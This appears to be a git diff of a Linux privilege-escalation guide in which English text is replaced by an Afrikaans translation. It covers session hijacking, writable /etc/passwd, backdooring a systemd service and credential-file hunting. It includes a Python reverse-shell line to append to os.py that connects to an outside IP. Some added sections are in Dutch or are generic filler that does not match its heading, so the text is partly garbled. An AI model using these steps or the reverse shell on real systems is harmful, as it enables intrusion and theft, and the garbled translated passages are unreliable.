+**Gee** gebruiker "kali" lees- en skryfbevoegdhede oor 'n lêer: ```bash setfacl -m u:kali:rw file.txt #Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included) setfacl -b file.txt #Remove the ACL of the file ``` - -**Get** files with specific ACLs from the system: - +**Kry** lêers met spesifieke ACL's van die stelsel: ```bash getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null ``` +## Oop skul sessies -## Open shell sessions +In **ou weergawes** kan jy dalk 'n **skul**-sessie van 'n ander gebruiker (**root**) **kaap**.\ +In die **nuutste weergawes** sal jy slegs in staat wees om aan skerm-sessies van **jou eie gebruiker** te **koppel**. Jy kan egter **interessante inligting binne die sessie vind**. -In **old versions** you may **hijack** some **shell** session of a different user (**root**).\ -In **newest versions** you will be able to **connect** to screen sessions only of **your own user**. However, you could find **interesting information inside the session**. - -### screen sessions hijacking - -**List screen sessions** +### Skerm-sessies kaap +**Lys skerm-sessies op** ```bash screen -ls screen -ls / # Show another user' screen sessions ``` +**Koppel aan 'n sessie** -![](<../../.gitbook/assets/image (130).png>) +Om toegang te verkry tot 'n aktiewe sessie op 'n Linux-stelsel, kan jy die volgende stappe volg: -**Attach to a session** +1. Identifiseer die sessie wat jy wil koppel aan deur die `who` of `w` opdrag uit te voer. Hierdie opdrag sal 'n lys van aktiewe sessies toon, insluitend die gebruikersnaam en die tty (teletipe) waarop die sessie uitgevoer word. +2. Gebruik die `screen` of `tmux` hulpmiddel om aan die sessie te koppel. Hierdie hulpmiddels bied die vermoë om aan te sluit by 'n bestaande sessie sonder om die huidige sessie te onderbreek. + +3. Voer die relevante opdrag in om die sessie te manipuleer of te monitor. 
+ +Hier is 'n voorbeeld van hoe om aan 'n sessie te koppel met behulp van die `screen` hulpmiddel: + +```bash +screen -r +``` + +Hier is 'n voorbeeld van hoe om aan 'n sessie te koppel met behulp van die `tmux` hulpmiddel: + +```bash +tmux attach-session -t +``` + +Onthou om die korrekte sessie-ID te gebruik wanneer jy aan 'n sessie koppel. ```bash screen -dr #The -d is to detach whoever is attached to it screen -dr 3350.foo #In the example of the image screen -x [user]/[session id] ``` +## tmux-sessies kaping -## tmux sessions hijacking - -This was a problem with **old tmux versions**. I wasn't able to hijack a tmux (v2.1) session created by root as a non-privileged user. - -**List tmux sessions** +Dit was 'n probleem met **ou tmux-weergawes**. Ek was nie in staat om 'n tmux (v2.1) sessie wat deur root as 'n nie-bevoorregte gebruiker geskep is, te kaap nie. +**Lys tmux-sessies** ```bash tmux ls ps aux | grep tmux #Search for tmux consoles not using default folder for sockets tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess ``` +**Koppel aan 'n sessie** -![](<../../.gitbook/assets/image (131).png>) +Om toegang te verkry tot 'n aktiewe sessie op 'n Linux-stelsel, kan jy die volgende stappe volg: -**Attach to a session** +1. Identifiseer die sessie wat jy wil koppel aan deur die `who` of `w` opdrag uit te voer. Hierdie opdrag sal 'n lys van aktiewe sessies toon, insluitend die gebruikersnaam en die tty (teletipe) waarop die sessie uitgevoer word. +2. Gebruik die `screen` of `tmux` hulpmiddel om aan die sessie te koppel. Hierdie hulpmiddels bied die vermoë om aan te sluit by 'n bestaande sessie sonder om die huidige sessie te onderbreek. + +3. Voer die relevante opdrag in om die sessie te manipuleer of te monitor. 
+ +Hier is 'n voorbeeld van hoe om aan 'n sessie te koppel met behulp van die `screen` hulpmiddel: + +```bash +screen -r +``` + +Hier is 'n voorbeeld van hoe om aan 'n sessie te koppel met behulp van die `tmux` hulpmiddel: + +```bash +tmux attach -t +``` + +Onthou om die korrekte sessie-ID te gebruik wanneer jy aan 'n sessie koppel. ```bash tmux attach -t myname #If you write something in this session it will appears in the other opened one tmux attach -d -t myname #First detach the session from the other console and then access it yourself 
@@ -1318,149 +1313,151 @@ rw-rw---- 1 root devs 0 Sep 1 06:27 /tmp/dev_sess #In this case root and devs c # If you are root or devs you can access it tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket ``` - -Check **Valentine box from HTB** for an example. +Kyk na **Valentine-boks van HTB** vir 'n voorbeeld. ## SSH -### Debian OpenSSL Predictable PRNG - CVE-2008-0166 +### Debian OpenSSL Voorspelbare PRNG - CVE-2008-0166 -All SSL and SSH keys generated on Debian based systems (Ubuntu, Kubuntu, etc) between September 2006 and May 13th, 2008 may be affected by this bug.\ -This bug is caused when creating a new ssh key in those OS, as **only 32,768 variations were possible**. This means that all the possibilities can be calculated and **having the ssh public key you can search for the corresponding private key**. You can find the calculated possibilities here: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) +Alle SSL- en SSH-sleutels wat gegenereer is op Debian-gebaseerde stelsels (Ubuntu, Kubuntu, ens.) tussen September 2006 en 13 Mei 2008 kan deur hierdie fout geraak word.\ +Hierdie fout word veroorsaak wanneer 'n nuwe ssh-sleutel geskep word in hierdie bedryfstelsels, aangesien **slegs 32,768 variasies moontlik was**. Dit beteken dat al die moontlikhede bereken kan word en **deur die ssh-publieke sleutel te hê, kan jy soek na die ooreenstemmende privaat sleutel**. Jy kan die berekende moontlikhede hier vind: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) -### SSH Interesting configuration values +### SSH Interessante konfigurasiewaardes -* **PasswordAuthentication:** Specifies whether password authentication is allowed. The default is `no`. -* **PubkeyAuthentication:** Specifies whether public key authentication is allowed. The default is `yes`. 
-* **PermitEmptyPasswords**: When password authentication is allowed, it specifies whether the server allows login to accounts with empty password strings. The default is `no`. +* **PasswordAuthentication:** Spesifiseer of wagwoord-verifikasie toegelaat word. Die verstek is `no`. +* **PubkeyAuthentication:** Spesifiseer of publieke sleutel-verifikasie toegelaat word. Die verstek is `yes`. +* **PermitEmptyPasswords**: Wanneer wagwoord-verifikasie toegelaat word, spesifiseer dit of die bediener toelaat dat daar aanteken word by rekeninge met leë wagwoordstrings. Die verstek is `no`. ### PermitRootLogin -Specifies whether root can log in using ssh, default is `no`. Possible values: +Spesifiseer of root kan inlog met ssh, verstek is `no`. Moontlike waardes: -* `yes`: root can login using password and private key -* `without-password` or `prohibit-password`: root can only login with a private key -* `forced-commands-only`: Root can login only using private key and if the commands options are specified -* `no` : no +* `yes`: root kan inlog met wagwoord en privaat sleutel +* `without-password` of `prohibit-password`: root kan slegs inlog met 'n privaat sleutel +* `forced-commands-only`: Root kan slegs inlog met 'n privaat sleutel en as die opsiesspesifiseer is +* `no` : nee ### AuthorizedKeysFile -Specifies files that contain the public keys that can be used for user authentication. It can contain tokens like `%h`, which will be replaced by the home directory. **You can indicate absolute paths** (starting in `/`) or **relative paths from the user's home**. For example: - +Spesifiseer lêers wat die publieke sleutels bevat wat gebruik kan word vir gebruikersverifikasie. Dit kan tokens soos `%h` bevat, wat vervang sal word deur die tuisgids. **Jy kan absolute paaie aandui** (beginnend met `/`) of **relatiewe paaie vanaf die gebruiker se tuisgids**. 
Byvoorbeeld: ```bash AuthorizedKeysFile .ssh/authorized_keys access ``` - -That configuration will indicate that if you try to login with the **private** key of the user "**testusername**" ssh is going to compare the public key of your key with the ones located in `/home/testusername/.ssh/authorized_keys` and `/home/testusername/access` +Daardie konfigurasie sal aandui dat as jy probeer om in te teken met die **privaat** sleutel van die gebruiker "**testusername**", ssh die publieke sleutel van jou sleutel gaan vergelyk met die een wat in `/home/testusername/.ssh/authorized_keys` en `/home/testusername/access` geleë is. ### ForwardAgent/AllowAgentForwarding -SSH agent forwarding allows you to **use your local SSH keys instead of leaving keys** (without passphrases!) sitting on your server. So, you will be able to **jump** via ssh **to a host** and from there **jump to another** host **using** the **key** located in your **initial host**. - -You need to set this option in `$HOME/.ssh.config` like this: +SSH-agent deurstuur maak dit moontlik om jou plaaslike SSH-sleutels te gebruik in plaas daarvan om sleutels (sonder wagwoorde!) op jou bediener te laat staan. So, sal jy in staat wees om via ssh **na 'n gasheer te spring** en van daar af **na 'n ander** gasheer te spring **deur gebruik te maak van** die **sleutel** wat in jou **oorspronklike gasheer** geleë is. +Jy moet hierdie opsie in `$HOME/.ssh.config` so instel: ``` Host example.com - ForwardAgent yes +ForwardAgent yes ``` +Let daarop dat as `Host` `*` is, sal daardie host elke keer as die gebruiker na 'n ander masjien spring, toegang tot die sleutels hê (wat 'n veiligheidsprobleem is). -Notice that if `Host` is `*` every time the user jumps to a different machine, that host will be able to access the keys (which is a security issue). 
+Die lêer `/etc/ssh_config` kan hierdie opsies **oorheers** en hierdie konfigurasie toelaat of weier.\ +Die lêer `/etc/sshd_config` kan ssh-agent deurstuur toelaat of weier met die sleutelwoord `AllowAgentForwarding` (verstek is toelaat). -The file `/etc/ssh_config` can **override** this **options** and allow or denied this configuration.\ -The file `/etc/sshd_config` can **allow** or **denied** ssh-agent forwarding with the keyword `AllowAgentForwarding` (default is allow). - -If you find that Forward Agent is configured in an environment read the following page as **you may be able to abuse it to escalate privileges**: +As jy vind dat Forward Agent in 'n omgewing gekonfigureer is, lees dan die volgende bladsy **om moontlik voorregte te verhoog**: {% content-ref url="ssh-forward-agent-exploitation.md" %} [ssh-forward-agent-exploitation.md](ssh-forward-agent-exploitation.md) {% endcontent-ref %} -## Interesting Files +## Interessante Lêers -### Profiles files - -The file `/etc/profile` and the files under `/etc/profile.d/` are **scripts that are executed when a user runs a new shell**. Therefore, if you can **write or modify any of them you can escalate privileges**. +### Profiel-lêers +Die lêer `/etc/profile` en die lêers onder `/etc/profile.d/` is **skripte wat uitgevoer word wanneer 'n gebruiker 'n nuwe skil gebruik**. Daarom, as jy enige van hulle kan **skryf of wysig, kan jy voorregte verhoog**. ```bash ls -l /etc/profile /etc/profile.d/ ``` +As enige vreemde profiel skrips gevind word, moet jy dit nagaan vir **sensitiewe besonderhede**. -If any weird profile script is found you should check it for **sensitive details**. - -### Passwd/Shadow Files - -Depending on the OS the `/etc/passwd` and `/etc/shadow` files may be using a different name or there may be a backup. 
Therefore it's recommended **find all of them** and **check if you can read** them to see **if there are hashes** inside the files: +### Passwd/Shadow-lêers +Afhanklik van die bedryfstelsel kan die `/etc/passwd` en `/etc/shadow` lêers 'n ander naam gebruik of daar kan 'n rugsteun wees. Daarom word dit aanbeveel om **al hulle te vind** en te **nagaan of jy dit kan lees** om te sien **of daar hasings** binne die lêers is: ```bash #Passwd equivalent files cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null #Shadow equivalent files cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null ``` - -In some occasions you can find **password hashes** inside the `/etc/passwd` (or equivalent) file - +In sommige gevalle kan jy **wagwoordhasings** binne die `/etc/passwd` (of ekwivalente) lêer vind. ```bash grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null ``` +### Skryfbare /etc/passwd -### Writable /etc/passwd - -First, generate a password with one of the following commands. - +Eerstens, genereer 'n wagwoord met een van die volgende opdragte. ``` openssl passwd -1 -salt hacker hacker mkpasswd -m SHA-512 hacker python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' ``` - -Then add the user `hacker` and add the generated password. - +Voeg dan die gebruiker `hacker` by en voeg die gegenereerde wagwoord by. ``` hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash ``` +Byvoorbeeld: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` -E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` - -You can now use the `su` command with `hacker:hacker` - -Alternatively, you can use the following lines to add a dummy user without a password.\ -WARNING: you might degrade the current security of the machine. 
+Jy kan nou die `su` bevel gebruik met `hacker:hacker` +As alternatief kan jy die volgende lyne gebruik om 'n dummie-gebruiker sonder 'n wagwoord by te voeg.\ +WAARSKUWING: jy kan die huidige veiligheid van die masjien verminder. ``` echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd su - dummy ``` +NOTA: In BSD-platforms is `/etc/passwd` geleë by `/etc/pwd.db` en `/etc/master.passwd`, ook is die `/etc/shadow` hernoem na `/etc/spwd.db`. -NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. - -You should check if you can **write in some sensitive files**. For example, can you write to some **service configuration file**? - +Jy moet nagaan of jy kan **skryf na sekere sensitiewe lêers**. Byvoorbeeld, kan jy skryf na 'n **dienskonfigurasie-lêer**? ```bash find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user ``` - -For example, if the machine is running a **tomcat** server and you can **modify the Tomcat service configuration file inside /etc/systemd/,** then you can modify the lines: - +Byvoorbeeld, as die masjien 'n **tomcat**-bediener hardloop en jy die **Tomcat-dienskonfigurasie-lêer binne /etc/systemd/ kan wysig**, kan jy die lyne wysig: ``` ExecStart=/path/to/backdoor User=root Group=root ``` +Jou agterdeur sal uitgevoer word die volgende keer as tomcat begin word. -Your backdoor will be executed the next time that tomcat is started. 
- -### Check Folders - -The following folders may contain backups or interesting information: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Probably you won't be able to read the last one but try) +### Kontroleer Lêers +Die volgende lêers mag rugsteuners of interessante inligting bevat: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Waarskynlik sal jy nie in staat wees om die laaste een te lees nie, maar probeer) ```bash ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root ``` +### Vreemde Ligging/Eienaar-lêers -### Weird Location/Owned files +In sommige gevallen kan het nuttig zijn om te zoeken naar bestanden die zich op ongebruikelijke locaties bevinden of die eigendom zijn van andere gebruikers. Dit kan wijzen op mogelijke beveiligingsproblemen of privilege-escalatiekansen. +Hier zijn enkele locaties en bestanden die u kunt controleren: + +#### /tmp + +De map /tmp wordt vaak gebruikt om tijdelijke bestanden op te slaan. Het is mogelijk dat kwaadwillende gebruikers hier bestanden plaatsen om later toegang te krijgen tot het systeem. Controleer de inhoud van /tmp en verwijder verdachte bestanden. + +#### /var/tmp + +Net als /tmp wordt /var/tmp gebruikt voor tijdelijke bestanden. Controleer ook hier de inhoud en verwijder verdachte bestanden. + +#### /dev/shm + +/dev/shm is een virtueel bestandssysteem dat wordt gebruikt voor het delen van geheugen tussen processen. Het kan ook worden misbruikt om kwaadaardige bestanden te plaatsen. Controleer de inhoud van /dev/shm en verwijder verdachte bestanden. + +#### /var/www/html + +De map /var/www/html wordt vaak gebruikt voor het hosten van webinhoud. Als u geen webserver op uw systeem hebt geïnstalleerd, kan het wijzen op een ongeautoriseerde toegang. Controleer de inhoud van /var/www/html en verwijder eventuele verdachte bestanden. 
+ +#### Bestanden die eigendom zijn van andere gebruikers + +Controleer de bestanden op uw systeem en let op bestanden die eigendom zijn van andere gebruikers dan de standaardgebruiker. Dit kan erop wijzen dat een gebruiker ongeautoriseerde toegang heeft gekregen tot uw systeem. Onderzoek deze bestanden en neem passende maatregelen. + +Het controleren van deze locaties en bestanden kan u helpen bij het identificeren van mogelijke beveiligingsproblemen en het voorkomen van privilege-escalatie. ```bash #root owned files in /home folders find /home -user root 2>/dev/null 
@@ -1472,77 +1469,176 @@ find / -type f -user root ! -perm -o=r 2>/dev/null find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null #Writable files by each group I belong to for g in `groups`; - do printf " Group $g:\n"; - find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null - done +do printf " Group $g:\n"; +find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null +done done ``` +### Gewysigde lêers in die laaste minute -### Modified files in last mins +Hier is 'n paar maniere om gewysigde lêers in die laaste paar minute op te spoor: +#### Met behulp van die `find`-opdrag + +Gebruik die volgende opdrag om gewysigde lêers in die huidige gids in die laaste 5 minute op te spoor: + +```bash +find . -type f -mmin -5 +``` + +Hier is 'n kort verduideliking van die gebruikte vlagte: + +- `.`: Dui aan dat die soektog in die huidige gids plaasvind. +- `-type f`: Slegs soek na gewone lêers (nie gidslêers of spesiale lêers nie). +- `-mmin -5`: Soek na lêers wat in die laaste 5 minute gewysig is. + +#### Met behulp van die `ls`-opdrag + +Gebruik die volgende opdrag om 'n lys van gewysigde lêers in die huidige gids in die laaste 10 minute te kry: + +```bash +ls -lt --time=minutes --time-style=+"%Y-%m-%d %H:%M" | grep "$(date -d '10 minutes ago' +'%Y-%m-%d %H:%M')" +``` + +Hier is 'n kort verduideliking van die gebruikte vlagte: + +- `-lt`: Sorteer die lêers volgens gewysigde tyd, met die nuutste bo-aan. +- `--time=minutes`: Toon die gewysigde tyd in minute. +- `--time-style=+"%Y-%m-%d %H:%M"`: Spesifiseer die formaat van die gewysigde tyd. +- `grep "$(date -d '10 minutes ago' +'%Y-%m-%d %H:%M')"`: Filter die lys om slegs die lêers te toon wat in die laaste 10 minute gewysig is. 
+ +#### Met behulp van die `find`-opdrag en `stat`-opdrag + +Gebruik die volgende opdrag om gewysigde lêers in die huidige gids in die laaste 15 minute op te spoor: + +```bash +find . -type f -exec stat -c "%y %n" {} \; | awk -v lim="$(date -d '15 minutes ago' +'%Y-%m-%d %H:%M:%S')" '$0 > lim' +``` + +Hier is 'n kort verduideliking van die gebruikte vlagte: + +- `-exec stat -c "%y %n" {} \;`: Voer die `stat`-opdrag uit vir elke gevonde lêer en toon die gewysigde tyd en lêernaam. +- `awk -v lim="$(date -d '15 minutes ago' +'%Y-%m-%d %H:%M:%S')" '$0 > lim'`: Filter die uitset van die `stat`-opdrag om slegs die lêers te toon wat in die laaste 15 minute gewysig is. ```bash find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null ``` +### Sqlite DB-lêers -### Sqlite DB files +SQLite is 'n selfbevatte, bedienerlose, open source SQL-databasisenjin wat gebruik word om databasislêers te skep en te bestuur. Hierdie databasislêers is gewoonlik plat lêers wat gebruik kan word deur toepassings om data te stoor en te onttrek. SQLite-databasislêers het die .db-lêeruitbreiding. +#### Identifiseer SQLite-databasislêers + +Om SQLite-databasislêers op 'n Linux-stelsel te identifiseer, kan jy die volgende opdrag gebruik: + +```bash +find / -name "*.db" 2>/dev/null +``` + +Hierdie opdrag sal soek na alle lêers met die .db-uitbreiding in die hele lêerstelsel en die resultate vertoon. + +#### Toegang tot SQLite-databasislêers + +As jy toegang tot 'n SQLite-databasislêer wil verkry, kan jy dit oopmaak met 'n SQLite-kliënt. Jy kan die volgende opdrag gebruik om 'n SQLite-kliënt te open: + +```bash +sqlite3 +``` + +Vervang `` met die pad na die SQLite-databasislêer wat jy wil oopmaak. + +#### Uitvoer van SQL-opdragte + +Nadat jy 'n SQLite-databasislêer oopgemaak het met die SQLite-kliënt, kan jy SQL-opdragte uitvoer om data te onttrek of te wysig. 
Hier is 'n paar nuttige opdragte: + +- `SELECT * FROM ;` - Gee alle rekords terug in 'n spesifieke tabel. +- `INSERT INTO VALUES ();` - Voeg 'n nuwe rekord by in 'n spesifieke tabel. +- `UPDATE SET = WHERE ;` - Werk 'n spesifieke rekord in 'n tabel opdateer. +- `DELETE FROM WHERE ;` - Verwyder 'n spesifieke rekord uit 'n tabel. + +Vervang ``, ``, `` en `` met die toepaslike waardes vir jou spesifieke situasie. + +#### Let op + +By die gebruik van SQLite-databasislêers, moet jy bewus wees van die risiko van datakorrupsie of verlies. Maak altyd 'n afskrif van die oorspronklike databasislêer voordat jy enige wysigings aanbring. ```bash find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null ``` - -### \*\_history, .sudo\_as\_admin\_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml files - +### \*\_geskiedenis, .sudo\_as\_admin\_suksesvol, profiel, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml lêers ```bash find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null ``` +### Versteekte lêers -### Hidden files +In Linux, versteekte lêers is lêers wat begin met 'n punt (.) in die naam. Hierdie lêers is nie sigbaar wanneer jy die `ls`-opdrag gebruik nie, tensy jy die `-a`-vlag gebruik. Dit is 'n goeie praktyk om belangrike lêers te versteek om te voorkom dat hulle per ongeluk verwyder of gewysig word. +Om versteekte lêers te sien, gebruik die volgende opdrag: + +```bash +ls -a +``` + +Dit sal alle lêers, insluitend die versteekte lêers, in die huidige gids vertoon. 
+ +As jy 'n spesifieke versteekte lêer wil sien, gebruik die volgende opdrag: + +```bash +ls -a .versteekte_lêer +``` + +Hierdie opdrag sal die inhoud van die spesifieke versteekte lêer vertoon. + +Dit is belangrik om te onthou dat versteekte lêers nie noodwendig veilig is nie. Hulle kan steeds toegangbaar wees vir 'n aanvaller wat toegang tot die stelsel verkry het. ```bash find / -type f -iname ".*" -ls 2>/dev/null ``` +### **Skrip/Binêre lêers in PAD** -### **Script/Binaries in PATH** +As jy 'n gebruiker met beperkte regte is op 'n Linux-stelsel, kan jy dalk toegang verkry tot hoër regte deur gebruik te maak van skrip- of binêre lêers wat in die PAD (Path) van die stelsel geplaas is. Die PAD is 'n lys van directories waarin die stelsel soek vir uitvoerbare lêers wanneer 'n opdrag uitgevoer word. +Om hierdie tegniek te gebruik, moet jy 'n skrip of binêre lêer skep met dieselfde naam as 'n bestaande opdrag wat hoër regte vereis. Wanneer die gebruiker met beperkte regte die opdrag uitvoer, sal die stelsel die skrip of binêre lêer in die PAD vind en uitvoer, wat jou toegang tot die hoër regte gee. + +Dit is belangrik om te onthou dat hierdie tegniek slegs werk as die gebruiker met beperkte regte die regte het om die oorspronklike opdrag uit te voer. ```bash for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done for d in `echo $PATH | tr ":" "\n"`; do find $d -type -f -executable 2>/dev/null; done ``` - -### **Web files** - +### **Weblêers** ```bash ls -alhR /var/www/ 2>/dev/null ls -alhR /srv/www/htdocs/ 2>/dev/null ls -alhR /usr/local/www/apache22/data/ ls -alhR /opt/lampp/htdocs/ 2>/dev/null ``` +### **Rugsteun** -### **Backups** +Backups is 'n belangrike aspek van enige goeie beveiligingsstrategie. Dit behels die maak van kopieë van belangrike data en lêers om te verseker dat dit beskikbaar is in die geval van 'n ongeluk, data verlies, of 'n aanval. 
Hier is 'n paar belangrike punte om in gedagte te hou wanneer dit kom by backups: +- **Gereelde backups**: Maak gereelde kopieë van jou data om te verseker dat jy die mees onlangse weergawe daarvan het. Dit kan help om verlies van data te voorkom in die geval van 'n aanval of ongeluk. +- **Veilige opberging**: Berg jou backups op 'n veilige plek op, soos 'n eksterne hardeskyf of 'n beveiligde skyf in die wolk. Dit sal help om te verseker dat jou backups nie blootgestel word aan potensiële aanvalle of data verlies nie. +- **Toets jou backups**: Dit is belangrik om gereeld jou backups te toets om seker te maak dat die data suksesvol herstel kan word. Dit sal jou help om te verseker dat jou backups werk en dat jy in staat sal wees om jou data te herstel in die geval van 'n noodgeval. +- **Versleuteling**: As jou backups sensitiewe inligting bevat, oorweeg om dit te versleutel om te verseker dat dit nie in die verkeerde hande val nie. Dit sal help om die vertroulikheid van jou data te beskerm. +- **Offsite backups**: Maak kopieë van jou data op 'n offsite plek, soos 'n ander fisiese ligging of 'n beveiligde wolkoplossing. Dit sal help om te verseker dat jou backups nie verlore gaan in die geval van 'n ramp by jou primêre ligging nie. + +Deur hierdie beste praktyke te volg, kan jy verseker dat jou data veilig en beskikbaar bly, selfs in die geval van 'n aanval of ongeluk. 
```bash find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/null ``` +### Bekende lêers wat wagwoorde bevat -### Known files containing passwords +Lees die kode van [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), dit soek na **verskeie moontlike lêers wat wagwoorde kan bevat**.\ +**Nog 'n interessante instrument** wat jy kan gebruik om dit te doen is: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) wat 'n oopbron-toepassing is wat gebruik word om baie wagwoorde wat op 'n plaaslike rekenaar vir Windows, Linux & Mac gestoor word, te herwin. -Read the code of [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), it searches for **several possible files that could contain passwords**.\ -**Another interesting tool** that you can use to do so is: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) which is an open source application used to retrieve lots of passwords stored on a local computer for Windows, Linux & Mac. - -### Logs - -If you can read logs, you may be able to find **interesting/confidential information inside them**. The more strange the log is, the more interesting it will be (probably).\ -Also, some "**bad**" configured (backdoored?) **audit logs** may allow you to **record passwords** inside audit logs as explained in this post: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). +### Logboeke +As jy logboeke kan lees, kan jy dalk **interessante/vertroulike inligting daarin vind**. Hoe vreemder die logboek is, hoe interessanter dit sal wees (waarskynlik).\ +Ook kan sommige "**sleg**" gekonfigureerde (agterdeur?) 
**ouditlogboeke** jou in staat stel om wagwoorde in ouditlogboeke op te neem, soos verduidelik in hierdie pos: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). ```bash aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g" grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null ``` +Om **logboeke van die groep te lees** sal die [**adm**](interesting-groups-linux-pe/#adm-group) groep baie nuttig wees. -In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-group) will be really helpful. - -### Shell files - +### Skuldlêers ```bash ~/.bash_profile # if it exists, read it once when you log in to the shell ~/.bash_login # if it exists, read it once if .bash_profile doesn't exist 
@@ -1553,75 +1649,70 @@ In order to **read logs the group** [**adm**](interesting-groups-linux-pe/#adm-g ~/.zlogin #zsh shell ~/.zshrc #zsh shell ``` +### Algemene Creds Soek/Regex -### Generic Creds Search/Regex +Jy moet ook kyk vir lêers wat die woord "**password**" in die **naam** of binne die **inhoud** bevat, en kyk ook vir IP-adresse en e-posse binne loglêers, of hashe regexps.\ +Ek gaan nie hier lys hoe om dit alles te doen nie, maar as jy belangstel, kan jy die laaste kontroles wat [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) uitvoer, nagaan. -You should also check for files containing the word "**password**" in its **name** or inside the **content**, and also check for IPs and emails inside logs, or hashes regexps.\ -I'm not going to list here how to do all of this but if you are interested you can check the last checks that [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh) perform. +## Skryfbare lêers -## Writable files +### Python-biblioteek kaping -### Python library hijacking - -If you know from **where** a python script is going to be executed and you **can write inside** that folder or you can **modify python libraries**, you can modify the OS library and backdoor it (if you can write where python script is going to be executed, copy and paste the os.py library). - -To **backdoor the library** just add at the end of the os.py library the following line (change IP and PORT): +As jy weet **waarvandaan** 'n Python-skripsie uitgevoer gaan word en jy **kan binne** daardie vouer skryf of jy kan **Python-biblioteke wysig**, kan jy die OS-biblioteek wysig en dit agterdeur maak (as jy kan skryf waar die Python-skripsie uitgevoer gaan word, kopieer en plak die os.py-biblioteek). 
+Om die biblioteek **agterdeur te maak**, voeg net die volgende lyn by die einde van die os.py-biblioteek (verander IP en PORT): ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ``` +### Logrotate uitbuiting -### Logrotate exploitation - -A vulnerability in `logrotate` lets users with **write permissions** on a log file or its parent directories potentially gain escalated privileges. This is because `logrotate`, often running as **root**, can be manipulated to execute arbitrary files, especially in directories like _**/etc/bash_completion.d/**_. It's important to check permissions not just in _/var/log_ but also in any directory where log rotation is applied. +'n Swakheid in `logrotate` stel gebruikers met **skryfregte** op 'n loglêer of sy ouer gids in staat om moontlik verhoogde bevoegdhede te verkry. Dit is omdat `logrotate`, wat dikwels as **root** loop, gemanipuleer kan word om willekeurige lêers uit te voer, veral in gids soos _**/etc/bash_completion.d/**_. Dit is belangrik om nie net in _/var/log_ nie, maar ook in enige gids waar logrotasie toegepas word, na regte te kyk. {% hint style="info" %} -This vulnerability affects `logrotate` version `3.18.0` and older +Hierdie swakheid affekteer `logrotate` weergawe `3.18.0` en ouer {% endhint %} -More detailed information about the vulnerability can be found on this 